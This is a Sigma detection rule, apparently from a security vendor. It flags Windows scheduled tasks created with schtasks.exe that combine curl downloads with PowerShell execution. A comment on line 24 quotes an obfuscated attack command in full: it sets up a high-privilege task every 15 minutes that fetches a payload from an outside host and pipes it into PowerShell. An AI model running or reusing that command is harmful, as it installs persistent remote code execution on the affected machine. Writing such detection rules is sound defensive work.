Scheduled Task Creation with Curl and PowerShell Execution Combo

 1title: Scheduled Task Creation with Curl and PowerShell Execution Combo
 2id: 1d174d38-8fda-4081-a9b6-56d9763c0cd8
 3status: experimental
 4description: |
 5    Detects the creation of a scheduled task using schtasks.exe, potentially in combination with curl for downloading payloads and PowerShell for executing them.
 6    This facilitates executing malicious payloads or connecting with C&C server persistently without dropping the malware sample on the host.    
 7references:
 8    - https://tria.ge/241015-l98snsyeje/behavioral2
 9author: Swachchhanda Shrawan Poudel (Nextron Systems)
10date: 2025-02-05
11tags:
12    - attack.privilege-escalation
13    - attack.execution
14    - attack.persistence
15    - attack.t1053.005
16    - attack.defense-evasion
17    - attack.t1218
18    - attack.command-and-control
19    - attack.t1105
20logsource:
21    category: process_creation
22    product: windows
23detection:
24    # Example: cmd start /min /c schtasks /create /tn PolicyConverter /sc minute /mo 15 /tr "conhost --headless cmd /v:on /c set a=https&set b=inh&set c=ostne&set d=tservice.co&set e=!a!://www.!b!!c!!d!m& curl -o - !e!/mscu/lokc.php?wl=HGNBWBGW**Admin | powershell" /rl Highest
25    selection_img:
26        Image|endswith: '\schtasks.exe'
27        CommandLine|contains|windash: ' /create '
28    selection_curl:
29        CommandLine|contains|all:
30            - 'curl '
31            - 'http'
32            - '-o'
33    selection_powershell:
34        CommandLine|contains: 'powershell'
35    condition: all of selection_*
36falsepositives:
37    - Legitimate use of schtasks for administrative purposes.
38    - Automation scripts combining curl and PowerShell in controlled environments.
39level: medium